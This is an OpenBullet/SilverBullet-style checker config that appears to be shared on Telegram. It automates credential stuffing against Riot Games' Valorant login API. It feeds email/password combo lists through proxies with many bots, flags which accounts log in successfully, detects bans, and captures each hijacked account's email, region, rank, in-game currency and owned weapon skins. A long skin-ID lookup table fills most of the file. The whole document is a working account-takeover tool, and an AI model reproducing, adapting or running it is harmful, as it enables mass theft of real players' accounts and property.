[SETTINGS]
{
  "Name": "Valorant Full Config",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2022-05-29T09:11:52.3268515+05:30",
  "AdditionalInfo": "Join For More @ShinChanGiveaways || @ShinChanConfigs",
  "RequiredPlugins": [],
  "Author": "Droidever",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Valorant Full Capture",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Replace "@.*" "" UseRegex=TRUE "<USER>" -> VAR "USERR" 

REQUEST POST "https://auth.riotgames.com/api/v1/authorization" 
  CONTENT "{\"acr_values\":\"urn:riot:bronze\",\"claims\":\"\",\"client_id\":\"riot-client\",\"nonce\":\"ih0ckcv8kNAghtFLBfyAwQ\",\"redirect_uri\":\"http://localhost/redirect\",\"response_type\":\"token id_token\",\"scope\":\"openid link ban lol_region\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: auth.riotgames.com" 
  HEADER "user-agent: RiotClient/30.0.1.3715678.3712489 rso-auth (Windows;10;;Professional, x64)" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate" 

REQUEST PUT "https://auth.riotgames.com/api/v1/authorization" 
  CONTENT "{\"language\":\"en_US\",\"password\":\"<PASS>\",\"region\":null,\"remember\":false,\"type\":\"auth\",\"username\":\"<USERR>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: auth.riotgames.com" 
  HEADER "user-agent: RiotClient/30.0.1.3715678.3712489 rso-auth (Windows;10;;Professional, x64)" 
  HEADER "Cache-Control: no-cache" 
  HEADER "Content-Type: application/json" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "access_token" 
  KEYCHAIN Failure OR 
    KEY "auth_failure" 

REQUEST POST "https://auth.riotgames.com/api/v1/authorization" 
  CONTENT "{\"client_id\":\"player-support-zendesk\",\"redirect_uri\":\"https://login.playersupport.riotgames.com/login_callback\",\"response_type\":\"code\",\"scope\":\"openid email\",\"ui_locales\":\"en-us en-us\"}" 
  CONTENTTYPE "application/json" 
  HEADER "origin: https://auth.riotgames.com" 
  HEADER "referer: https://auth.riotgames.com/login" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 OPR/73.0.3856.424" 

REQUEST POST "https://auth.riotgames.com/api/v1/authorization" 
  CONTENT "{\"acr_values\":\"urn:riot:bronze\",\"claims\":\"\",\"client_id\":\"riot-client\",\"nonce\":\"oYnVwCSrlS5IHKh7iI17oQ\",\"redirect_uri\":\"http://localhost/redirect\",\"response_type\":\"token id_token\",\"scope\":\"openid link ban lol_region\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: RiotClient/17.1.0 (rso-auth)" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Proxy-Connection: keep-alive" 
  HEADER "Content-Type: application/json" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: auth.riotgames.com" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 216" 

PARSE "<SOURCE>" LR "token=" "&scop" -> VAR "str" 

REQUEST POST "https://entitlements.auth.riotgames.com/api/token/v1" 
  CONTENT " " 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <str>" 

PARSE "<SOURCE>" JSON "entitlements_token" -> VAR "text3" 

REQUEST POST "https://auth.riotgames.com/userinfo" 
  CONTENT "" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <str>" 
  HEADER "X-Riot-Entitlements-JWT: <text3>" 

#valoban PARSE "<SOURCE>" LR "\",\"scope\":\"a" "\"," -> VAR "valoban" 

IF "<valoban>" Contains "res"
JUMP #atlama3
ENDIF

#lolban PARSE "<SOURCE>" LR "\",\"scope\":\"l" "\"," -> VAR "lolban" 

IF "<lolban>" Contains "ol"
JUMP #atlama2
ENDIF

#atlama3 PARSE "<SOURCE>" LR "asdfasdfasasdfab" "asdfasdfasdf" -> VAR "atlama3" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "\":\"PERMANENT_BAN" 
    KEY "\":\"AC_SCRIPTING_PERMANENT" 
    KEY "\":\"PERMA_BAN" 
    KEY "Player banned" 

#atlama2 PARSE "<SOURCE>" LR "asdfasdfasasdfa" "asdfasdfasdf" -> VAR "atlama2" 

PARSE "<SOURCE>" JSON "username" CreateEmpty=FALSE -> CAP "Username" 

PARSE "<SOURCE>" JSON "tag_line" CreateEmpty=FALSE -> CAP "Tag Line" 

PARSE "<SOURCE>" JSON "game_name" CreateEmpty=FALSE -> CAP "Game Name" 

PARSE "<SOURCE>" JSON "summoner_level" CreateEmpty=FALSE -> CAP "Level" 

PARSE "<SOURCE>" JSON "pvpnet_account_id" CreateEmpty=FALSE -> CAP "Account ID" 

PARSE "<SOURCE>" JSON "country" CreateEmpty=FALSE -> CAP "Country" 

PARSE "<SOURCE>" JSON "cpid" -> VAR "reg" 

PARSE "<SOURCE>" JSON "summoner_name" CreateEmpty=FALSE -> CAP "NickName" 

PARSE "<SOURCE>" JSON "sub" -> VAR "sub" 

PARSE "<SOURCE>" JSON "email_verified" CreateEmpty=FALSE -> CAP "EmailVerified" 

FUNCTION Translate 
  KEY "BR1" VALUE "BR" 
  KEY "EUN1" VALUE "EUN" 
  KEY "EUW1" VALUE "EUW" 
  KEY "JP1" VALUE "JP" 
  KEY "KR" VALUE "KR" 
  KEY "LA1" VALUE "LAN" 
  KEY "LA2" VALUE "LAS" 
  KEY "NA1" VALUE "NA" 
  KEY "OC1" VALUE "OCE" 
  KEY "PBE1" VALUE "PBE" 
  KEY "RU" VALUE "RU" 
  KEY "TR1" VALUE "TR" 
  "<reg>" -> CAP "Region" 

REQUEST GET "https://api.henrikdev.xyz/valorant/v1/account/<Game Name>/<Tag Line>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <str>" 
  HEADER "X-Riot-Entitlements-JWT: <text3>" 

PARSE "<SOURCE>" JSON "puuid" CreateEmpty=FALSE -> CAP "puuids" 

PARSE "<SOURCE>" JSON "region" CreateEmpty=FALSE -> CAP "reg2" 

REQUEST GET "https://api.henrikdev.xyz/valorant/v1/by-puuid/mmr/<reg2>/<puuids>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <str>" 
  HEADER "X-Riot-Entitlements-JWT: <text3>" 

PARSE "<SOURCE>" JSON "currenttierpatched" CreateEmpty=FALSE -> CAP "Rankw" 

REQUEST GET "https://api.henrikdev.xyz/valorant/v1/by-puuid/mmr-history/<reg2>/<puuids>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <str>" 
  HEADER "X-Riot-Entitlements-JWT: <text3>" 

PARSE "<SOURCE>" JSON "date" CreateEmpty=FALSE -> CAP "Dates" 

REQUEST GET "https://pd.eu.a.pvp.net/match-history/v1/history/<sub>?startIndex=0&endIndex=10" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <str>" 
  HEADER "X-Riot-Entitlements-JWT: <text3>" 

PARSE "<SOURCE>" JSON "Total" CreateEmpty=FALSE -> CAP "TotalRecentGames" 

#email REQUEST GET "https://email-verification.riotgames.com/api/v1/account/status" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <str>" 
  HEADER "X-Riot-Entitlements-JWT: <text3>" 

#email PARSE "<SOURCE>" JSON "email" CreateEmpty=FALSE -> CAP "Email" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "@" 
  KEYCHAIN Retry OR 
    KEY "<SOURCE>" DoesNotContain "<Email>" 

REQUEST GET "https://pd.eu.a.pvp.net/store/v1/wallet/<sub>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <str>" 
  HEADER "X-Riot-Entitlements-JWT: <text3>" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "MISSING_ENTITLEMENT" 
  KEYCHAIN Success OR 
    KEY "{\"Balances\":{\"" 

PARSE "<SOURCE>" JSON "85ad13f7-3d1b-5128-9eb2-7cd8ee0b5741" CreateEmpty=FALSE -> CAP "Valorant Point" 

PARSE "<SOURCE>" JSON "e59aa87c-4cbf-517a-5983-6e81511be9b7" CreateEmpty=FALSE -> CAP "Radianite Points" 

REQUEST GET "https://pd.eu.a.pvp.net/match-history/v1/history/<sub>?startIndex=0&endIndex=10" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <str>" 
  HEADER "X-Riot-Entitlements-JWT: <text3>" 

PARSE "<SOURCE>" JSON "Total" CreateEmpty=FALSE -> CAP "TotalRecentGames" 

REQUEST GET "https://pd.eu.a.pvp.net/personalization/v2/players/<sub>/playerloadout" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <str>" 
  HEADER "X-Riot-Entitlements-JWT: <text3>" 

#skin PARSE "<SOURCE>" LR "\",\"SkinID\":\"" "Incognito\":" -> VAR "skin" 

PARSE "<skin>" LR "SkinID\":\"" "\"," Recursive=TRUE -> VAR "skin1" 

#skins FUNCTION Translate 
  KEY "97af88e4-4176-9fa3-4a26-57919443dab7" VALUE "Glitchpop Odin" 
  KEY "2715f184-46cc-bec1-dd7c-e7b4d1aeb625" VALUE "Nitro Odin" 
  KEY "cda41b87-4d3a-c17c-5f6d-8990cc9c5efb" VALUE "dot EXE Odin" 
  KEY "157bcebe-484d-82e2-2a60-c8b4b11197ea" VALUE "Prime//2.0 Odin" 
  KEY "72e724e9-4ba4-2d12-ce1a-8db1a528b9d3" VALUE "Prism III Odin" 
  KEY "9e648b20-4ed5-1f34-87a9-979cbe9a958a" VALUE "Smite Odin" 
  KEY "65baa0cd-42ec-f99d-54a0-338d795b5824" VALUE "Sensation Odin" 
  KEY "57523cf0-4574-968b-9f17-168e3bdb6d0d" VALUE "Lightwave Odin" 
  KEY "f454efd1-49cb-372f-7096-d394df615308" VALUE "" 
  KEY "befa2f32-410f-a418-d8d3-b194dcf2ec6d" VALUE "Aerosol Odin" 
  KEY "85ed3f9d-4e59-a709-8faf-bc86effb3a07" VALUE "BlastX Odin" 
  KEY "e9fce399-4abc-bb3c-8992-f887918ce327" VALUE "VALORANT GO! Vol. 2 Ares" 
  KEY "8b9855f2-4cc6-0c44-3e7c-d0b2a32c6950" VALUE "Aristocrat Ares" 
  KEY "ac65b631-4bd1-b0fa-3313-0da74d4eba9d" VALUE "Nebula Ares" 
  KEY "e901bdeb-405f-d06c-0733-6783274d85b0" VALUE "Singularity Ares" 
  KEY "4e04647a-4cfc-64f8-4643-f6b7dbcb2943" VALUE "Rush Ares" 
  KEY "556646c0-46dd-6986-00df-a78d1c17f268" VALUE "Hivemind Ares" 
  KEY "e089be41-4242-b28d-1894-bbba193957a2" VALUE "Infantry Ares" 
  KEY "4308fe43-44c1-9fe8-d5f9-95be2bc70d51" VALUE "Outpost Ares" 
  KEY "841c9aab-4005-f7fd-3b67-24b335100fb4" VALUE "Prism Ares" 
  KEY "d21e2975-4586-635c-3fe4-e6be738243b3" VALUE "Celestial Ares" 
  KEY "cd8eb70d-443c-d9fd-48cd-98bace9d5132" VALUE "Minima Ares" 
  KEY "ff555802-4633-0c8b-93f8-b8887666e3ad" VALUE "POLYfrog Ares" 
  KEY "e4b7f196-4f05-825f-e795-a59fc829195d" VALUE "Jigsaw Ares" 
  KEY "2666f98d-4f88-8cb9-4927-629d75a6a7ad" VALUE "Sakura Ares" 
  KEY "9f3e2ba6-428f-c635-67e0-b8b7d9e3c2fc" VALUE "Sentinels of Light Ares" 
  KEY "5305d9c4-4f46-fbf4-9e9a-dea772c263b5" VALUE "" 
  KEY "e5490f71-455b-74ad-f762-f5a876d4dff9" VALUE "RGX 11z Pro Vandal" 
  KEY "ba6f2526-4ed2-8e62-49aa-ebbb04290682" VALUE "VALORANT GO! Vol. 2 Vandal" 
  KEY "6191bb0b-456f-1a3e-df13-cdb0c1b8b1e4" VALUE "Aristocrat Vandal" 
  KEY "6c4315b8-4ff1-baaa-5aac-5790c7443353" VALUE "Origin Vandal" 
  KEY "74789f33-4632-8052-96d7-258538721a32" VALUE "Glitchpop Vandal" 
  KEY "18609205-4edb-5966-cff8-0fba0230ba1e" VALUE "Elderflame Vandal" 
  KEY "9b62faf1-416c-b736-0edb-39b890f1f18d" VALUE "Nitro Vandal" 
  KEY "f7f63b78-4b12-b21e-a0e7-6bafbad81509" VALUE "Hivemind Vandal" 
  KEY "437307c6-424c-6a48-9738-949b91166353" VALUE "Forsaken Vandal" 
  KEY "948d31a0-4c2a-9c82-2b89-fe9f2ec65036" VALUE "Ruin Vandal" 
  KEY "6f3a2a08-4f32-dbdc-8dca-628a5c840052" VALUE "dot EXE Vandal" 
  KEY "9d71edb0-453c-defa-507d-57aa2935b379" VALUE "Horizon Vandal" 
  KEY "b9ee2457-481c-6776-3f5b-0ca8e8f90c89" VALUE "Prime Vandal" 
  KEY "41b55c92-4aeb-9c86-854a-4abcd48ea0ba" VALUE "Avalanche Vandal" 
  KEY "a383091d-4c7a-eb6d-0f45-e78232ede644" VALUE "Prism II Vandal" 
  KEY "11a93854-44f0-bd66-f434-3f81744ddd8d" VALUE "K/TAC Vandal" 
  KEY "30fd16af-4560-b2e2-7780-ee8148a0946a" VALUE "Luxe Vandal" 
  KEY "d758abc0-4d99-62d3-b22b-0db0e57de881" VALUE "Silvanus Vandal" 
  KEY "72c1e90b-40ca-4304-02eb-28bb2aea4ed2" VALUE "Sensation Vandal" 
  KEY "f946ef5c-46ab-e146-a712-1d99a1651356" VALUE "Sakura Vandal" 
  KEY "e8df3725-40de-b8ec-77bd-62a989685a85" VALUE "Sentinels of Light Vandal" 
  KEY "30388628-42f0-606c-82c0-73ad43de997f" VALUE "Reaver Vandal" 
  KEY "f2b034e0-4b54-5abc-25c8-d293b6f1d247" VALUE "Tethered Realms Vandal" 
  KEY "1eb7639f-4e90-5b5b-9f53-a792103d6f29" VALUE "Cavalier Vandal" 
  KEY "27f21d97-4c4b-bd1c-1f08-31830ab0be84" VALUE "" 
  KEY "f2871246-441c-5f41-3dac-13947139adec" VALUE "Depths Vandal" 
  KEY "8c22a4b2-4da0-f2f2-9bd1-c89d106cd646" VALUE "Ego Vandal" 
  KEY "32b87592-45ad-c5a6-44ae-a9b844137c58" VALUE "Wasteland Vandal" 
  KEY "16716d68-4d36-320f-aafd-f6a6bfa5abe2" VALUE "Winterwunderland Vandal" 
  KEY "c610dbc8-4a90-3c86-7f9e-bfa910f75bb9" VALUE "Aristocrat Bulldog" 
  KEY "fbe04552-445f-f202-923e-6fbd61b7e2aa" VALUE "Spectrum Bulldog" 
  KEY "285c6731-4451-b930-7a3d-c5a736d00f5e" VALUE "Glitchpop Bulldog" 
  KEY "23399beb-4828-0d03-ae24-aaa62b08f796" VALUE "Rush Bulldog" 
  KEY "e931dcc8-48d4-f895-48b1-199ec573625b" VALUE "Horizon Bulldog" 
  KEY "f476843a-4fc1-32a1-5e32-c18b84003460" VALUE "K/TAC Bulldog" 
  KEY "199b8536-488a-09e6-8592-ff9cf21b4ceb" VALUE "Couture Bulldog" 
  KEY "dbf7b813-4931-3b45-db2b-ea8d418b2b1d" VALUE "POLYfox Bulldog" 
  KEY "decd0962-453a-1551-47e1-1287aafb5a27" VALUE "Infinity Bulldog" 
  KEY "724a7f42-4315-eccf-0e76-77bdd3ec2e09" VALUE "" 
  KEY "f580899d-49c4-8bf8-9718-c9a6a38dd503" VALUE "Convex Bulldog" 
  KEY "4e6341f9-4851-603d-daff-9185f007d3dc" VALUE "Depths Bulldog" 
  KEY "9bba8d9a-461e-9783-fcb7-f1a92192fb3a" VALUE "Varnish Bulldog" 
  KEY "0acbabbe-4f4c-f643-284b-f69029abb54e" VALUE "VALORANT GO! Vol. 1 Phantom" 
  KEY "980fa063-436e-e51f-c38d-70a5b93a0f1c" VALUE "Spectrum Phantom" 
  KEY "57f91d68-4cda-76c0-c258-7ba507cd6f87" VALUE "Nebula Phantom" 
  KEY "25a7f0f2-4bce-7e45-b4b0-ca9264f5dfcc" VALUE "Glitchpop Phantom" 
  KEY "5eec4ce6-443d-e9b5-4c5b-2b967d426bd3" VALUE "Singularity Phantom" 
  KEY "8db507b5-4d57-96e0-000e-2d8c8af79550" VALUE "Rush Phantom" 
  KEY "44b7b110-46bf-ccbb-2613-29a5df296461" VALUE "Prime//2.0 Phantom" 
  KEY "c38dced0-454d-d296-522e-6f8643decd3b" VALUE "Avalanche Phantom" 
  KEY "6586a7db-4041-6a29-f37c-d6817657caa5" VALUE "Prism Phantom" 
  KEY "a903e567-480f-a3f9-adb8-1da714a2d63c" VALUE "Serenity Phantom" 
  KEY "5b43d27b-419c-f2bc-53fe-d7829dad46b3" VALUE "Ruination Phantom" 
  KEY "e13afe1e-4734-2094-fee8-9db016e4d54a" VALUE "Kingdom Phantom" 
  KEY "8d3ead4a-4421-f1f2-4292-ecac859fc135" VALUE "Smite Phantom" 
  KEY "8c0cc1e8-4c1b-20a0-122d-16b4334d1b80" VALUE "Celestial Phantom" 
  KEY "13f553a1-4124-7c29-05e9-e7932fdeabb6" VALUE "Spline Phantom" 
  KEY "2e3538f1-450f-cfe6-f93e-73862cd39314" VALUE "Minima Phantom" 
  KEY "41892314-4a99-0048-1838-e38cd680ea26" VALUE "Galleria Phantom" 
  KEY "25824735-478d-30b7-8fc9-95b1999f9d3b" VALUE "Silvanus Phantom" 
  KEY "e86bf7e4-4dd3-fbee-533b-fa875344bbaf" VALUE "Ion Phantom" 
  KEY "36791b03-452d-8dad-0091-898cc28d2196" VALUE "Oni Phantom" 
  KEY "909daea4-49ab-7b99-46fb-aa8c9e6fd837" VALUE "Artisan Phantom" 
  KEY "29665396-4dc8-c409-5e38-228949690f1e" VALUE "Lightwave Phantom" 
  KEY "d67b929f-4431-61c0-286e-3ebf3d11c4af" VALUE "Recon Phantom" 
  KEY "1f835677-4ed7-fec2-6b80-c3ac384323f6" VALUE "Infinity Phantom" 
  KEY "337cb216-4a6e-d85d-88c2-f29ab317784c" VALUE "" 
  KEY "59af9c5d-43ee-1360-f3a7-a9a6ff6e478b" VALUE "BlastX Phantom" 
  KEY "a5c64455-4fd0-9207-fc97-e086af99a2a6" VALUE "Winterwunderland Phantom" 
  KEY "28a659a4-439e-fcd0-6236-d39979ee5c51" VALUE "Glitchpop Judge" 
  KEY "0221b120-444b-6d1b-fc50-e4a98e470eb2" VALUE "Elderflame Judge" 
  KEY "f6db3976-4c70-c3bf-01f8-dca6d335319a" VALUE "Rush Judge" 
  KEY "fbd23fdf-4d7b-8a50-afa5-c3ad6e7266e5" VALUE "dot EXE Judge" 
  KEY "400d71b1-4090-6abf-224e-21938569fe24" VALUE "Outpost Judge" 
  KEY "1fc3f066-4211-d65a-42ab-b287c6bb2448" VALUE "Prism III Judge" 
  KEY "3a1c857a-4671-0667-8efe-ee90b8ba1e5a" VALUE "Serenity Judge" 
  KEY "5324bc65-44aa-1a16-ede4-0e9b56f35d0e" VALUE "Smite Judge" 
  KEY "57ad1e5d-4289-4de0-7926-899cef10db37" VALUE "Celestial Judge" 
  KEY "5237cfca-4d83-6190-a7f9-d2bdc117ea67" VALUE "Luxe Judge" 
  KEY "5d217dd0-4f2c-cfca-274e-3f8f9d518b13" VALUE "POLYfox Judge" 
  KEY "ba93a991-407f-0c47-2d26-72a4196b4164" VALUE "Jigsaw Judge" 
  KEY "8e27a0b3-4dc9-e2a7-e33a-29a616efc244" VALUE "Sensation Judge" 
  KEY "acd26127-48ff-8b9e-7ba6-b989af8a4b24" VALUE "" 
  KEY "03751fa0-46db-0df3-b8cb-99adf373ecda" VALUE "Convex Judge" 
  KEY "87591a69-47c1-a052-ba85-33a8097a0b07" VALUE "Varnish Judge" 
  KEY "96495eb3-40db-cb5b-1c69-17a3dde58ee3" VALUE "Origin Bucky" 
  KEY "1322a9a8-49ad-bc3a-2319-fb866e21334c" VALUE "Red Alert Bucky" 
  KEY "aa6162a5-4c73-1c6f-5c69-9b9082e321fd" VALUE "Surge Bucky" 
  KEY "d493bec2-4e3f-19cd-8363-b1921489413c" VALUE "Horizon Bucky" 
  KEY "8f26c1e0-46b7-72d2-8307-11b03f3332f2" VALUE "Monarch Bucky" 
  KEY "89eebdb1-4df6-0a1d-8988-f495cca4badb" VALUE "Prime//2.0 Bucky" 
  KEY "a6b07d50-4731-2775-042e-a896cb51bf13" VALUE "Prism II Bucky" 
  KEY "75e55415-45ce-b48b-b471-84bef2368e33" VALUE "Kingdom Bucky" 
  KEY "5ac14aef-41cc-a0c8-895f-e1a69b33aeff" VALUE "Magepunk Bucky" 
  KEY "2a0700dc-4181-ae19-2b49-818b24dceacb" VALUE "Galleria Bucky" 
  KEY "31f6f214-4379-749a-9285-04a5561e2d03" VALUE "Ion Bucky" 
  KEY "7da96a2a-43ce-91c2-28f9-0c95529d133e" VALUE "Oni Bucky" 
  KEY "1a97f146-4fcf-5a04-140e-4390feafaa73" VALUE "Artisan Bucky" 
  KEY "0dc9a874-41c5-e582-9a36-37946043346c" VALUE "Gravitational Uranium Neuroblaster Bucky" 
  KEY "26582dc8-43dd-15b6-a31c-739b90302bea" VALUE "Lightwave Bucky" 
  KEY "e6eefed6-4d10-5794-4859-6d9ab5ff1d66" VALUE "Cavalier Bucky" 
  KEY "70c97fb2-4d79-d4bb-5173-a1888cd4bfd9" VALUE "" 
  KEY "cf2cc18c-42ec-3fb0-4ca7-3583373a33ab" VALUE "Aerosol Bucky" 
  KEY "d5ea8ae9-4055-9b65-1f39-ed97372d887a" VALUE "RGX 11z Pro Frenzy" 
  KEY "7d05d1ce-4bf2-fa96-d8f4-dca86052e3d2" VALUE "RagnaRocker Frenzy" 
  KEY "cceb25d7-41e7-1944-515f-2eb5695fd5cc" VALUE "Origin Frenzy" 
  KEY "5596d764-4b62-210b-59db-7982e9d4c23f" VALUE "Glitchpop Frenzy" 
  KEY "4fb9ea7d-45a6-9154-7a46-648781b081c4" VALUE "Elderflame Frenzy" 
  KEY "a010c5fc-4343-067d-4dfb-ee836ec0a45f" VALUE "Rush Frenzy" 
  KEY "d6af3716-4ab5-8204-a2f4-1eb4ffc51088" VALUE "Swooping Frenzy" 
  KEY "17162b11-45fc-5b66-2e49-79ac9d60032c" VALUE "Horizon Frenzy" 
  KEY "b543f6c4-4404-4e5e-1fcf-67a0cd8e9bc4" VALUE "Monarch Frenzy" 
  KEY "51446541-47dd-b661-470e-9d89b3b6a33b" VALUE "Prime//2.0 Frenzy" 
  KEY "08bfb08f-48cc-2699-2f5c-aabec43dd43a" VALUE "Couture Frenzy" 
  KEY "307dbbc2-442d-b92b-0af2-278a8505672a" VALUE "Celestial Frenzy" 
  KEY "5bb5acb1-44dd-184b-484e-319188ef78eb" VALUE "Spitfire Frenzy" 
  KEY "531135cc-48cb-68bf-8c99-149e46670c80" VALUE "Sensation Frenzy" 
  KEY "f67d4d78-4567-f8ca-010b-18919c49aa05" VALUE "Lightwave Frenzy" 
  KEY "f06657f3-48b6-6314-7235-a9a2749df5b9" VALUE "" 
  KEY "79005812-4d5c-cc6d-e2bd-19bc86c29349" VALUE "BlastX Frenzy" 
  KEY "b06e13ff-4f19-c750-ffcd-8084dfc3bbf5" VALUE "VALORANT GO! Vol. 2 Classic" 
  KEY "46f32f75-4fc8-7121-8a77-db8db43afc67" VALUE "Spectrum Classic" 
  KEY "34919680-4f00-554b-0c2b-95acca7d0d36" VALUE "Pistolinha Classic" 
  KEY "41fce834-4c76-a0f4-2cf8-cca3ae879eab" VALUE "Red Alert Classic" 
  KEY "8b2598eb-4db9-6338-4a25-c780402c780e" VALUE "Glitchpop Classic" 
  KEY "6cc70eae-4297-91d5-adb9-efa48004da77" VALUE "Surge Classic" 
  KEY "10354287-40e9-4087-85c5-aea7289d31f2" VALUE "Songsteel Classic" 
  KEY "c612138e-4007-6d0c-64ad-3690c65ee4a7" VALUE "Forsaken Classic" 
  KEY "144ac55d-42b9-338c-fb32-c9a31f4da5bb" VALUE "FIRE/arm Classic" 
  KEY "d653f4a7-4e92-2559-0a97-2c9d46d009b3" VALUE "Prime Classic" 
  KEY "6b6a219d-490a-45f1-1e5c-40bbf3df5f28" VALUE "Avalanche Classic" 
  KEY "62abf8b2-4511-131d-42c9-81a5efd1b901" VALUE "Prism III Classic" 
  KEY "e72d72ab-4284-1469-b544-478a811a29a6" VALUE "Kingdom Classic" 
  KEY "22fdc42d-4ad6-2bec-8033-8a8bdf178826" VALUE "Smite Classic" 
  KEY "750d4f04-4fea-391b-fa8b-539815a63164" VALUE "Spline Classic" 
  KEY "2f9f4637-4377-b55f-97a1-1e8974e29b27" VALUE "Galleria Classic" 
  KEY "81ddbfcd-4081-8341-ff76-ad8cdb26ce4c" VALUE "Gravitational Uranium Neuroblaster Classic" 
  KEY "6ba7a7a0-4057-4d5c-7c98-579f232db298" VALUE "Sakura Classic" 
  KEY "706f4a29-4a95-7370-c983-1a8b167e38b7" VALUE "Infinity Classic" 
  KEY "24aee897-4cdc-b0fd-e596-1ba90fa6d1b2" VALUE "" 
  KEY "47d5e54a-48e5-b62a-5cf5-3cb7efc12e90" VALUE "Final Chamber Classic" 
  KEY "3714831b-4b90-bb6b-4185-7fb05ba9b9a2" VALUE "VALORANT GO! Vol. 1 Ghost" 
  KEY "67d3e2f7-4b73-7598-0027-63bd9e2e5fcc" VALUE "dot EXE Ghost" 
  KEY "a1d3a9e2-4f61-b1f7-3a01-cf867264d1cb" VALUE "Hush Ghost" 
  KEY "65ce6a98-4867-b695-279f-819c44ec6f95" VALUE "Infantry Ghost" 
  KEY "377ea8ac-46bf-52da-3173-109c2950dc9d" VALUE "Outpost Ghost" 
  KEY "8163db1a-4e3c-8f11-92fd-bc9e26253593" VALUE "Prism Ghost" 
  KEY "d8314b6c-45fc-fbda-a797-569a24c11bb9" VALUE "Serenity Ghost" 
  KEY "8a513c24-4c4d-ac15-6066-a1b2ff577041" VALUE "Ruination Ghost" 
  KEY "cb98b0d6-4e26-973c-c10d-a38637d04b65" VALUE "Luxe Ghost" 
  KEY "33824a13-453b-0636-4ec4-e19708aa934e" VALUE "Magepunk Ghost" 
